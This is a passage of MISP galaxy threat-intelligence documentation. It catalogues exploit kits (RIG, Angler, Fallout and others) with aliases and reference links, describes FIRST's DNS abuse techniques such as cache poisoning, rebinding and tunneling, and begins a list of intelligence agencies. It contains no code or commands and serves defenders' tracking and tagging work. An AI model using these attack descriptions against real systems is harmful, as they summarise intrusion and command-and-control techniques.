Underminer EK is an exploit kit that seems to be used privately against users in Asia. Functionalities: browser profiling and filtering, preventing of client revisits, URL randomization, and asymmetric encryption of payloads.

The tag is: misp-galaxy:exploit-kit="Underminer"

Underminer is also known as:

  • Underminer EK

Table 1576. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-underminer-exploit-kit-delivers-bootkit-and-cryptocurrency-mining-malware-with-encrypted-tcp-tunnel/

http://bobao.360.cn/interref/detail/248.html

Fallout

Fallout Exploit Kit appeared at the end of August 2018 as an updated Nuclear Pack featuring current exploits seen in competiting Exploit Kit.

The tag is: misp-galaxy:exploit-kit="Fallout"

Fallout is also known as:

  • Fallout

Fallout has relationships with:

  • dropped: misp-galaxy:ransomware="GandCrab" with estimative-language:likelihood-probability="almost-certain"

Table 1577. Table References

Links

https://www.nao-sec.org/2018/09/hello-fallout-exploit-kit.html

https://www.bleepingcomputer.com/news/security/new-fallout-exploit-kit-drops-gandcrab-ransomware-or-redirects-to-pups/

https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-now-installing-the-kraken-cryptor-ransomware/

Bingo

Bingo EK is the name chosen by the defense for a Fiesta-ish EK first spotted in March 2017 and targetting at that times mostly Russia

The tag is: misp-galaxy:exploit-kit="Bingo"

Terror EK

Terror EK is built on Hunter, Sundown and RIG EK code

The tag is: misp-galaxy:exploit-kit="Terror EK"

Terror EK is also known as:

  • Blaze EK

  • Neptune EK

Table 1578. Table References

Links

https://www.trustwave.com/Resources/SpiderLabs-Blog/Terror-Exploit-Kit—​More-like-Error-Exploit-Kit/

DealersChoice

DealersChoice is a Flash Player Exploit platform triggered by RTF.

DealersChoice is a platform that generates malicious documents containing embedded Adobe Flash files. Palo Alto Network researchers analyzed two variants — variant A, which is a standalone variant including Flash exploit code packaged with a payload, and variant B, which is a modular variant that loads exploit code on demand. This new component appeared in 2016 and is still in use.

The tag is: misp-galaxy:exploit-kit="DealersChoice"

DealersChoice is also known as:

  • Sednit RTF EK

Table 1579. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/10/unit42-dealerschoice-sofacys-flash-player-exploit-platform/

http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-ramps-up-spear-phishing-before-zero-days-get-patched/

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

DNSChanger

DNSChanger Exploit Kit is an exploit kit targeting Routers via the browser

The tag is: misp-galaxy:exploit-kit="DNSChanger"

DNSChanger is also known as:

  • RouterEK

Table 1580. Table References

Links

http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html

https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices

Novidade

Novidade Exploit Kit is an exploit kit targeting Routers via the browser

The tag is: misp-galaxy:exploit-kit="Novidade"

Novidade is also known as:

  • DNSGhost

Table 1581. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-exploit-kit-novidade-found-targeting-home-and-soho-routers/

Disdain

Disdain EK has been introduced on underground forum on 2017-08-07. The panel is stolen from Sundown, the pattern are Terror alike and the obfuscation reminds Nebula

The tag is: misp-galaxy:exploit-kit="Disdain"

Table 1582. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/new-disdain-exploit-kit-detected-wild/

Kaixin

Kaixin is an exploit kit mainly seen behind compromised website in Asia

The tag is: misp-galaxy:exploit-kit="Kaixin"

Kaixin is also known as:

  • CK vip

Table 1583. Table References

Links

http://www.kahusecurity.com/2013/deobfuscating-the-ck-exploit-kit/

http://www.kahusecurity.com/2012/new-chinese-exploit-pack/

MWI

Microsoft Word Intruder is an exploit kit focused on Word and embedded flash exploits. The author wants to avoid their customer to use it in mass spam campaign, so it’s most often connected to semi-targeted attacks

The tag is: misp-galaxy:exploit-kit="MWI"

Table 1585. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/04/a_new_word_document.html

https://www.sophos.com/en-us/medialibrary/PDFs/technical%20papers/sophos-microsoft-word-intruder-revealed.pdf

ThreadKit

ThreadKit is the name given to a widely used Microsoft Office document exploit builder kit that appeared in June 2017

The tag is: misp-galaxy:exploit-kit="ThreadKit"

Table 1586. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/unraveling-ThreadKit-new-document-exploit-builder-distribute-The-Trick-Formbook-Loki-Bot-malware

VenomKit

VenomKit is the name given to a kit sold since april 2017 as "Word 1day exploit builder" by user badbullzvenom. Author allows only use in targeted campaign. Is used for instance by the "Cobalt Gang"

The tag is: misp-galaxy:exploit-kit="VenomKit"

VenomKit is also known as:

  • Venom

Table 1587. Table References

Links

https://medium.com/@quoscient/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using-61cf0cb87648

Taurus Builder

Taurus Builder is a tool used to generate malicious MS Word documents that contain macros. The kit is advertised on forums by the user "badbullzvenom".

The tag is: misp-galaxy:exploit-kit="Taurus Builder"

RIG

RIG is an exploit kit that takes its source in Infinity EK itself an evolution of Redkit. It became dominant after the fall of Angler, Nuclear Pack and the end of public access to Neutrino. RIG-v is the name given to RIG 4 when it was only accessible by "vip" customers and when RIG 3 was still in use.

The tag is: misp-galaxy:exploit-kit="RIG"

RIG is also known as:

  • RIG 3

  • RIG-v

  • RIG 4

  • Meadgive

Table 1588. Table References

Links

http://www.kahusecurity.com/2014/rig-exploit-pack/

https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Reloaded---Examining-the-Architecture-of-RIG-Exploit-Kit-3-0/

https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Exploit-Kit-%E2%80%93-Diving-Deeper-into-the-Infrastructure/

http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html

Spelevo

Spelevo is an exploit kit that appeared at the end of February 2019 and could be an evolution of SPL EK

The tag is: misp-galaxy:exploit-kit="Spelevo"

Table 1589. Table References

Links

https://twitter.com/kafeine/status/1103649040800145409

Sednit EK

Sednit EK is the exploit kit used by APT28

The tag is: misp-galaxy:exploit-kit="Sednit EK"

Sednit EK is also known as:

  • SedKit

Table 1590. Table References

Links

http://www.welivesecurity.com/2014/10/08/sednit-espionage-group-now-using-custom-exploit-kit/

http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/

Sundown-P

Sundown-P/Sundown-Pirate is a rip of Sundown seen used in a private way (One group using it only) - First spotted at the end of June 2017, branded as CaptainBlack in August 2017

The tag is: misp-galaxy:exploit-kit="Sundown-P"

Sundown-P is also known as:

  • Sundown-Pirate

  • CaptainBlack

Table 1591. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/promediads-malvertising-sundown-pirate-exploit-kit/

Bizarro Sundown

Bizarro Sundown appears to be a fork of Sundown with added anti-analysis features

The tag is: misp-galaxy:exploit-kit="Bizarro Sundown"

Bizarro Sundown is also known as:

  • Sundown-b

Table 1592. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/

https://blog.malwarebytes.com/cybercrime/exploits/2016/10/yet-another-sundown-ek-variant/

Hunter

Hunter EK is an evolution of 3Ros EK

The tag is: misp-galaxy:exploit-kit="Hunter"

Hunter is also known as:

  • 3ROS Exploit Kit

Hunter has relationships with:

  • similar: misp-galaxy:tool="Tinba" with estimative-language:likelihood-probability="likely"

Table 1593. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/Hunter-Exploit-Kit-Targets-Brazilian-Banking-Customers

GreenFlash Sundown

GreenFlash Sundown is a variation of Bizarro Sundown without landing

The tag is: misp-galaxy:exploit-kit="GreenFlash Sundown"

GreenFlash Sundown is also known as:

  • Sundown-GF

Table 1594. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/

Angler

The Angler Exploit Kit has been the most popular and evolved exploit kit from 2014 to middle of 2016. There was several variation. The historical "indexm" variant was used to spread Lurk. A vip version used notabily to spread Poweliks, the "standard" commercial version, and a declinaison tied to load selling (mostly bankers) that can be associated to EmpirePPC

The tag is: misp-galaxy:exploit-kit="Angler"

Angler is also known as:

  • XXX

  • AEK

  • Axpergle

Table 1595. Table References

Links

https://blogs.sophos.com/2015/07/21/a-closer-look-at-the-angler-exploit-kit/

http://malware.dontneedcoffee.com/2015/12/xxx-is-angler-ek.html

http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html

Archie

Archie EK

The tag is: misp-galaxy:exploit-kit="Archie"

Table 1596. Table References

Links

https://www.alienvault.com/blogs/labs-research/archie-just-another-exploit-kit

BlackHole

The BlackHole Exploit Kit has been the most popular exploit kit from 2011 to 2013. Its activity stopped with Paunch’s arrest (all activity since then is anecdotal and based on an old leak)

The tag is: misp-galaxy:exploit-kit="BlackHole"

BlackHole is also known as:

  • BHEK

BlackHole has relationships with:

  • similar: misp-galaxy:rat="BlackHole" with estimative-language:likelihood-probability="likely"

Table 1597. Table References

Links

https://www.trustwave.com/Resources/SpiderLabs-Blog/Blackhole-Exploit-Kit-v2/

https://nakedsecurity.sophos.com/exploring-the-blackhole-exploit-kit/

Bleeding Life

Bleeding Life is an exploit kit that became open source with its version 2

The tag is: misp-galaxy:exploit-kit="Bleeding Life"

Bleeding Life is also known as:

  • BL

  • BL2

Table 1598. Table References

Links

http://www.kahusecurity.com/2011/flash-used-in-idol-malvertisement/

http://thehackernews.com/2011/10/bleeding-life-2-exploit-pack-released.html

Cool

The Cool Exploit Kit was a kind of BlackHole VIP in 2012/2013

The tag is: misp-galaxy:exploit-kit="Cool"

Cool is also known as:

  • CEK

  • Styxy Cool

Table 1599. Table References

Links

http://malware.dontneedcoffee.com/2012/10/newcoolek.html

http://malware.dontneedcoffee.com/2013/07/a-styxy-cool-ek.html

http://blog.trendmicro.com/trendlabs-security-intelligence/styx-exploit-pack-how-it-works/

Fiesta

Fiesta Exploit Kit

The tag is: misp-galaxy:exploit-kit="Fiesta"

Fiesta is also known as:

  • NeoSploit

  • Fiexp

Table 1600. Table References

Links

http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploit-kit-an

http://www.kahusecurity.com/2011/neosploit-is-back/

Empire

The Empire Pack is a variation of RIG operated by a load seller. It’s being fed by many traffic actors

The tag is: misp-galaxy:exploit-kit="Empire"

Empire is also known as:

  • RIG-E

Empire has relationships with:

  • similar: misp-galaxy:tool="Empire" with estimative-language:likelihood-probability="likely"

Table 1601. Table References

Links

http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html

FlashPack

FlashPack EK got multiple fork. The most common variant seen was the standalone Flash version

The tag is: misp-galaxy:exploit-kit="FlashPack"

FlashPack is also known as:

  • FlashEK

  • SafePack

  • CritXPack

  • Vintage Pack

Table 1602. Table References

Links

http://malware.dontneedcoffee.com/2012/11/meet-critxpack-previously-vintage-pack.html

http://malware.dontneedcoffee.com/2013/04/meet-safe-pack-v20-again.html

Glazunov

Glazunov is an exploit kit mainly seen behind compromised website in 2012 and 2013. Glazunov compromission is likely the ancestor activity of what became EITest in July 2014. Sibhost and Flimkit later shown similarities with this Exploit Kit

The tag is: misp-galaxy:exploit-kit="Glazunov"

Table 1603. Table References

Links

https://nakedsecurity.sophos.com/2013/06/24/taking-a-closer-look-at-the-glazunov-exploit-kit/

GrandSoft

GrandSoft Exploit Kit was a quite common exploit kit used in 2012/2013. Disappeared between march 2014 and September 2017

The tag is: misp-galaxy:exploit-kit="GrandSoft"

GrandSoft is also known as:

  • StampEK

  • SofosFO

Table 1604. Table References

Links

http://malware.dontneedcoffee.com/2013/09/FinallyGrandSoft.html

http://malware.dontneedcoffee.com/2012/10/neosploit-now-showing-bh-ek-20-like.html

https://nakedsecurity.sophos.com/2012/08/24/sophos-sucks-malware/

HanJuan

Hanjuan EK was a one actor fed variation of Angler EK used in evolved malvertising chain targeting USA. It has been using a 0day (CVE-2015-0313) from beginning of December 2014 till beginning of February 2015

The tag is: misp-galaxy:exploit-kit="HanJuan"

Table 1605. Table References

Links

http://www.malwaresigs.com/2013/10/14/unknown-ek/

https://blog.malwarebytes.com/threat-analysis/2014/08/shining-some-light-on-the-unknown-exploit-kit/

http://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-exploit-kit-in-cve-2015-0313-attack

https://twitter.com/kafeine/status/562575744501428226

Himan

Himan Exploit Kit

The tag is: misp-galaxy:exploit-kit="Himan"

Himan is also known as:

  • High Load

Table 1606. Table References

Links

http://malware.dontneedcoffee.com/2013/10/HiMan.html

Impact

Impact EK

The tag is: misp-galaxy:exploit-kit="Impact"

Table 1607. Table References

Links

http://malware.dontneedcoffee.com/2012/12/inside-impact-exploit-kit-back-on-track.html

Infinity

Infinity is an evolution of Redkit

The tag is: misp-galaxy:exploit-kit="Infinity"

Infinity is also known as:

  • Redkit v2.0

  • Goon

Table 1608. Table References

Links

http://blog.talosintel.com/2013/11/im-calling-this-goon-exploit-kit-for-now.html

http://www.kahusecurity.com/2014/the-resurrection-of-redkit/

Lightsout

Lightsout Exploit Kit has been used in Watering Hole attack performed by the APT Group havex

The tag is: misp-galaxy:exploit-kit="Lightsout"

Table 1609. Table References

Links

http://blog.talosintel.com/2014/03/hello-new-exploit-kit.html

http://blog.talosintel.com/2014/05/continued-analysis-of-lightsout-exploit.html

http://malwageddon.blogspot.fr/2013/09/unknown-ek-by-way-how-much-is-fish.html

Nebula

Nebula Exploit Kit has been built on Sundown source and features an internal TDS

The tag is: misp-galaxy:exploit-kit="Nebula"

Table 1610. Table References

Links

http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.html

Neutrino

Neutrino Exploit Kit has been one of the major exploit kit from its launch in 2013 till september 2016 when it become private (defense name for this variation is Neutrino-v). This EK vanished from march 2014 till november 2014.

The tag is: misp-galaxy:exploit-kit="Neutrino"

Neutrino is also known as:

  • Job314

  • Neutrino Rebooted

  • Neutrino-v

Neutrino has relationships with:

  • similar: misp-galaxy:malpedia="Neutrino" with estimative-language:likelihood-probability="likely"

Table 1611. Table References

Links

http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html

http://malware.dontneedcoffee.com/2014/11/neutrino-come-back.html

Niteris

Niteris was used mainly to target Russian.

The tag is: misp-galaxy:exploit-kit="Niteris"

Niteris is also known as:

  • CottonCastle

Table 1612. Table References

Links

http://malware.dontneedcoffee.com/2014/06/cottoncastle.html

http://malware.dontneedcoffee.com/2015/05/another-look-at-niteris-post.html

Nuclear

The Nuclear Pack appeared in 2009 and has been one of the longer living one. Spartan EK was a landing less variation of Nuclear Pack

The tag is: misp-galaxy:exploit-kit="Nuclear"

Nuclear is also known as:

  • NEK

  • Nuclear Pack

  • Spartan

  • Neclu

Table 1613. Table References

Links

http://blog.checkpoint.com/2016/05/17/inside-nuclears-core-unraveling-a-ransomware-as-a-service-infrastructure/

Phoenix

Phoenix Exploit Kit

The tag is: misp-galaxy:exploit-kit="Phoenix"

Phoenix is also known as:

  • PEK

Table 1614. Table References

Links

http://malwareint.blogspot.fr/2010/09/phoenix-exploits-kit-v21-inside.html

http://blog.trendmicro.com/trendlabs-security-intelligence/now-exploiting-phoenix-exploit-kit-version-2-5/

Private Exploit Pack

Private Exploit Pack

The tag is: misp-galaxy:exploit-kit="Private Exploit Pack"

Private Exploit Pack is also known as:

  • PEP

Table 1615. Table References

Links

http://malware.dontneedcoffee.com/2013/07/pep-new-bep.html

http://malwageddon.blogspot.fr/2013/07/unknown-ek-well-hey-hey-i-wanna-be.html

Redkit

Redkit has been a major exploit kit in 2012. One of its specific features was to allow its access against a share of a percentage of the customer’s traffic

The tag is: misp-galaxy:exploit-kit="Redkit"

Table 1616. Table References

Links

https://www.trustwave.com/Resources/SpiderLabs-Blog/A-Wild-Exploit-Kit-Appears----Meet-RedKit/

http://malware.dontneedcoffee.com/2012/05/inside-redkit.html

https://nakedsecurity.sophos.com/2013/05/09/redkit-exploit-kit-part-2/

Sakura

Sakura Exploit Kit appeared in 2012 and was adopted by several big actor

The tag is: misp-galaxy:exploit-kit="Sakura"

Table 1617. Table References

Links

http://www.xylibox.com/2012/01/sakura-exploit-pack-10.html

SPL

SPL exploit kit was mainly seen in 2012/2013 most often associated with ZeroAccess and Scareware/FakeAV

The tag is: misp-galaxy:exploit-kit="SPL"

SPL is also known as:

  • SPL_Data

  • SPLNet

  • SPL2

Table 1618. Table References

Links

http://www.malwaresigs.com/2012/12/05/spl-exploit-kit/

Sundown

Sundown Exploit Kit is mainly built out of stolen code from other exploit kits

The tag is: misp-galaxy:exploit-kit="Sundown"

Sundown is also known as:

  • Beps

  • Xer

  • Beta

Table 1619. Table References

Links

http://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html

https://www.virusbulletin.com/virusbulletin/2015/06/beta-exploit-pack-one-more-piece-crimeware-infection-road

Sweet-Orange

Sweet Orange

The tag is: misp-galaxy:exploit-kit="Sweet-Orange"

Sweet-Orange is also known as:

  • SWO

  • Anogre

Table 1620. Table References

Links

http://malware.dontneedcoffee.com/2012/12/juice-sweet-orange-2012-12.html

WhiteHole

WhiteHole Exploit Kit appeared in January 2013 in the tail of the CVE-2013-0422

The tag is: misp-galaxy:exploit-kit="WhiteHole"

Table 1622. Table References

Links

http://malware.dontneedcoffee.com/2013/02/briefly-wave-whitehole-exploit-kit-hello.html

Unknown

Unknown Exploit Kit. This is a place holder for any undocumented Exploit Kit. If you use this tag, we will be more than happy to give the associated EK a deep look.

The tag is: misp-galaxy:exploit-kit="Unknown"

Table 1623. Table References

Links

https://twitter.com/kafeine

https://twitter.com/node5

https://twitter.com/kahusecurity

SpelevoEK

The Spelevo exploit kit seems to have similarities to SPL EK, which is a different exploit kit.

The tag is: misp-galaxy:exploit-kit="SpelevoEK"

Table 1624. Table References

Links

https://cyberwarzone.com/what-is-the-spelevo-exploit-kit/

FIRST DNS Abuse Techniques Matrix

The Domain Name System (DNS) is a critical part of the Internet, including mapping domain names to IP addresses. Malicious threat actors use domain names, their corresponding technical resources, and other parts of the DNS infrastructure, including its protocols, for their malicious cyber operations. CERTs are confronted with reported DNS abuse on a continuous basis, and rely heavily on DNS analysis and infrastructure to protect their constituencies. Understanding the international customary norms applicable for detecting and mitigating DNS abuse from the perspective of the global incident response community is critical for the open Internet’s stability, security and resiliency. See also https://www.first.org/global/sigs/dns/ for more information..

FIRST DNS Abuse Techniques Matrix is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

FIRST.org - Andrey Meshkov (AdGuard) - Ángel González (INCIBE-CERT) - Angela Matlapeng (bwCSIRT) - Benedict Addis (Shadowserver) - Brett Carr (Nominet) - Carlos Alvarez (ICANN; founding member) - David Ruefenacht (Infoguard) - Gabriel Andrews (FBI) - John Todd (Quad9; current co-chair of DNS Abuse SIG) - Jonathan Matkowsky (RiskIQ / Microsoft; former co-chair) - Jonathan Spring (CISA; current co-chair of DNS Abuse SIG) - Mark Henderson (IRS) - Mark Svancarek (Microsoft) - Merike Kaeo (Double Shot Security) - Michael Hausding (SWITCH-CERT; former co-chair, current FIRST board member) - Peter Lowe (DNSFilter; current co-chair of DNS Abuse SIG) - Shoko Nakai (JPCERT/CC) - Swapneel Patnekar (Shreshta IT) - Trey Darley (FIRST board; founding member)

DGAs

DGAs - Domain Generation Algorithm

The tag is: misp-galaxy:first-dns="DGAs"

Table 1625. Table References

Links

https://attack.mitre.org/techniques/T1568/002/

Domain name compromise

The wrongfully taking control of a domain name from the rightful name holder. Compromised domains can be used for different kinds of malicious activity like sending spam or phishing, for distributing malware or as botnet command and control.

The tag is: misp-galaxy:first-dns="Domain name compromise"

Table 1626. Table References

Links

https://www.icann.org/groups/ssac/documents/sac-007-en

Lame delegations

Lame delegations occur as a result of expired nameserver domains allowing attackers to take control of the domain resolution by re-registering this expired nameserver domain.

The tag is: misp-galaxy:first-dns="Lame delegations"

Table 1627. Table References

Links

https://blog.apnic.net/2021/03/16/the-prevalence-persistence-perils-of-lame-nameservers/

DNS cache poisoning

DNS cache poisoning - also known as DNS spoofing, is a type of cyber attack in which an attacker corrupts a DNS resolver’s cache by injecting false DNS records, causing the resolver to records controlled by the attacker.

The tag is: misp-galaxy:first-dns="DNS cache poisoning"

Table 1628. Table References

Links

https://capec.mitre.org/data/definitions/142.html

DNS rebinding

DNS rebinding - a type of attack where a malicious website directs a client to a local network address, allowing the attacker to bypass the same-origin policy and gain access to the victim’s local resources.

The tag is: misp-galaxy:first-dns="DNS rebinding"

Table 1629. Table References

Links

https://capec.mitre.org/data/definitions/275.html

DNS server compromise

Attacker gains administrative privileges on an open recursive DNS server, authoritative DNS server, organizational recursive DNS server, or ISP-operated recursive DNS server.

The tag is: misp-galaxy:first-dns="DNS server compromise"

Stub resolver hijacking

The attacker compromises the Operating System of a computer or a phone with malicious code that intercepts and responds to DNS queries with rogue or malicious responses.

The tag is: misp-galaxy:first-dns="Stub resolver hijacking"

Local recursive resolver hijacking

Consumer Premise Equipment (CPE), such as home routers, often provide DNS recursion on the local network. If the CPE device is compromised, the attacker can change the recursive resolver behavior; for example, by changing responses.

The tag is: misp-galaxy:first-dns="Local recursive resolver hijacking"

On-path DNS attack

Attackers intercept communication between a user and a DNS server and provide different destination IP addresses pointing to malicious sites.

The tag is: misp-galaxy:first-dns="On-path DNS attack"

Table 1630. Table References

Links

https://www.imperva.com/learn/application-security/dns-hijacking-redirection/

DoS against the DNS

Multiple systems sending malicious traffic to a target at the same time.

The tag is: misp-galaxy:first-dns="DoS against the DNS"

DNS as a vector for DoS

Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Two prominent protocols that have enabled Reflection Amplification Floods are DNS and NTP through the use of several others in the wild have been documented. These Reflection and Amplification Floods can be directed against components of the DNS, like authoritative nameservers, rendering them unresponsive.

The tag is: misp-galaxy:first-dns="DNS as a vector for DoS"

Table 1631. Table References

Links

https://attack.mitre.org/techniques/T1498/002/

Dynamic DNS resolution

Dynamic DNS resolution (as obfuscation technique) - Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware’s communications. These calculations can be used to dynamically adjust parameters such as the domain name IP address or port number the malware uses for command and control.

The tag is: misp-galaxy:first-dns="Dynamic DNS resolution"

Table 1632. Table References

Links

https://attack.mitre.org/techniques/T1568/

Dynamic DNS resolution: Fast flux

Dynamic DNS resolution: Fast flux (as obfuscation technique) - Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name with multiple IP addresses assigned to it which are swapped with high frequency using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.

The tag is: misp-galaxy:first-dns="Dynamic DNS resolution: Fast flux"

Table 1633. Table References

Links

https://attack.mitre.org/techniques/T1568/001/

Infiltration and exfiltration via the DNS

Exfiltration via the DNS requires a delegated domain or, if the domain does not exist in the public DNS, the operation of a resolver preloaded with that domain’s zone file information and configured to receive and respond to the queries sent by the compromised devices.

The tag is: misp-galaxy:first-dns="Infiltration and exfiltration via the DNS"

Malicious registration of (effective) second level domains

For example, before attacking a victim, adversaries purchase or register domains from an ICANN-accredited registrar that can be used during targeting. See also CAPEC-630.

The tag is: misp-galaxy:first-dns="Malicious registration of (effective) second level domains"

Table 1634. Table References

Links

https://capec.mitre.org/data/definitions/630.html

Creation of malicious subdomains under dynamic DNS providers

Before attacking a victim, adversaries purchase or create domains from an entity other than a registrar or registry that provides subdomains under domains they own and control. S

The tag is: misp-galaxy:first-dns="Creation of malicious subdomains under dynamic DNS providers"

Table 1635. Table References

Links

https://en.wikipedia.org/wiki/Dynamic_DNS

Compromise of a non-DNS server to conduct abuse

  • Internet attack infrastructure is a broad category, and this covers any non-DNS server. Many compromised servers, such as web servers or mail servers, interact with the DNS or may be instrumental in conducting DNS abuse. For example, compromised mail servers are one technique that may be used to send phishing emails.

The tag is: misp-galaxy:first-dns="Compromise of a non-DNS server to conduct abuse"

Spoofing or otherwise using unregistered domain names

In a context where a domain name is expected (such as the From header in mail or a URL in a web page or message body), supplying a domain name not controlled by the attacker and that is not controlled by or registered to a legitimate registrant.

The tag is: misp-galaxy:first-dns="Spoofing or otherwise using unregistered domain names"

Spoofing of a registered domain

In a context where a domain name is expected (such as the From header in mail or a URL in a web page or message body), supplying a domain name not controlled by the attacker and that is in fact controlled by or registered to a legitimate registrant.

The tag is: misp-galaxy:first-dns="Spoofing of a registered domain"

DNS tunneling

DNS tunneling - tunneling another protocol over DNS - The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal expected traffic.

The tag is: misp-galaxy:first-dns="DNS tunneling"

Table 1636. Table References

Links

https://attack.mitre.org/techniques/T1071/004/

DNS beacons - C2 communication

DNS beacons - C2 communication - Successive or periodic DNS queries to a command & control server, either to exfiltrate data or await further commands from the C2.

The tag is: misp-galaxy:first-dns="DNS beacons - C2 communication"

Intelligence Agencies

List of intelligence agencies.

Intelligence Agencies is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Graham87 - Frietjes - Narky Blert - Pkbwcgs - Girth Summit - InternetArchiveBot - AnomieBOT - GreenMeansGo - MusikBot - Trappist the monk

General Directorate of Intelligence

General Directorate of Intelligence (GDI) – د استخباراتو لوی ریاست

The tag is: misp-galaxy:intelligence-agency="General Directorate of Intelligence"

General Directorate of Intelligence is also known as:

  • د استخباراتو لوی ریاست

Table 1637. Table References

Links

https://en.wikipedia.org/wiki/General_Directorate_of_Intelligence

National Intelligence Service (Albania)

State Intelligence Service (SHISH) – Sherbimi Informativ Shteteror

The tag is: misp-galaxy:intelligence-agency="National Intelligence Service (Albania)"

National Intelligence Service (Albania) is also known as:

  • Sherbimi Informativ Shteteror

Table 1638. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Service_(Albania)

Dirección de Observaciones Judiciales

Directorate of Judicial Surveillance (DOJ) – Dirección de Observaciones Judiciales

The tag is: misp-galaxy:intelligence-agency="Dirección de Observaciones Judiciales"

Table 1639. Table References

Links

https://en.wikipedia.org/wiki/Direcci%C3%B3n_de_Observaciones_Judiciales

Servicio Federal de Lucha contra el Narcotráfico

Federal Counternarcotics Service (SEFECONAR) – Servicio Federal de Lucha contra el Narcotráfico

The tag is: misp-galaxy:intelligence-agency="Servicio Federal de Lucha contra el Narcotráfico"

Table 1640. Table References

Links

https://en.wikipedia.org/wiki/Servicio_Federal_de_Lucha_contra_el_Narcotr%C3%A1fico

Inteligencia de la Gendarmería Nacional Argentina

Argentine National Gendarmerie Intelligence (SIGN) – Inteligencia de la Gendarmería Nacional Argentina

The tag is: misp-galaxy:intelligence-agency="Inteligencia de la Gendarmería Nacional Argentina"

Table 1641. Table References

Links

https://en.wikipedia.org/wiki/Inteligencia_de_la_Gendarmer%C3%ADa_Nacional_Argentina

Dirección Nacional de Inteligencia Estratégica Militar

National Directorate of Strategic Military Intelligence (DNIEM) – Dirección Nacional de Inteligencia Estratégica Militar

The tag is: misp-galaxy:intelligence-agency="Dirección Nacional de Inteligencia Estratégica Militar"

Table 1642. Table References

Links

https://en.wikipedia.org/wiki/Direcci%C3%B3n_Nacional_de_Inteligencia_Estrat%C3%A9gica_Militar

Inteligencia del Servicio Penitenciario Federal

Federal Penitentiary Service Intelligence – Inteligencia del Servicio Penitenciario Federal

The tag is: misp-galaxy:intelligence-agency="Inteligencia del Servicio Penitenciario Federal"

Table 1643. Table References

Links

https://en.wikipedia.org/wiki/Inteligencia_del_Servicio_Penitenciario_Federal

Inteligencia de la Policía de Seguridad Aeroportuaria

Airport Security Police Intelligence – Inteligencia de la Policía de Seguridad Aeroportuaria

The tag is: misp-galaxy:intelligence-agency="Inteligencia de la Policía de Seguridad Aeroportuaria"

Table 1644. Table References

Links

https://en.wikipedia.org/wiki/Inteligencia_de_la_Polic%C3%ADa_de_Seguridad_Aeroportuaria

Dirección Nacional de Inteligencia Criminal

National Directorate of Criminal Intelligence (DNIC) – Dirección Nacional de Inteligencia Criminal

The tag is: misp-galaxy:intelligence-agency="Dirección Nacional de Inteligencia Criminal"

Table 1645. Table References

Links

https://en.wikipedia.org/wiki/Direcci%C3%B3n_Nacional_de_Inteligencia_Criminal

Inteligencia de la Policía Federal Argentina

Argentine Federal Police Intelligence – Inteligencia de la Policía Federal Argentina

The tag is: misp-galaxy:intelligence-agency="Inteligencia de la Policía Federal Argentina"

Table 1646. Table References

Links

https://en.wikipedia.org/wiki/Inteligencia_de_la_Polic%C3%ADa_Federal_Argentina

Inteligencia de la Policía Bonaerense

Buenos Aires Police Intelligence (SIPBA) (Buenos Aires Police Intelligence) – Inteligencia de la Policía Bonaerense

The tag is: misp-galaxy:intelligence-agency="Inteligencia de la Policía Bonaerense"

Table 1647. Table References

Links

https://en.wikipedia.org/wiki/Inteligencia_de_la_Polic%C3%ADa_Bonaerense

Inteligencia de la Prefectura Naval Argentina

Argentine Naval Prefecture Intelligence (SIPN) – Inteligencia de la Prefectura Naval Argentina

The tag is: misp-galaxy:intelligence-agency="Inteligencia de la Prefectura Naval Argentina"

Table 1648. Table References

Links

https://en.wikipedia.org/wiki/Inteligencia_de_la_Prefectura_Naval_Argentina

Unidad de Inteligencia Financiera (Argentina)

Financial Intelligence Unit (UIF) – Unidad de Inteligencia Financiera

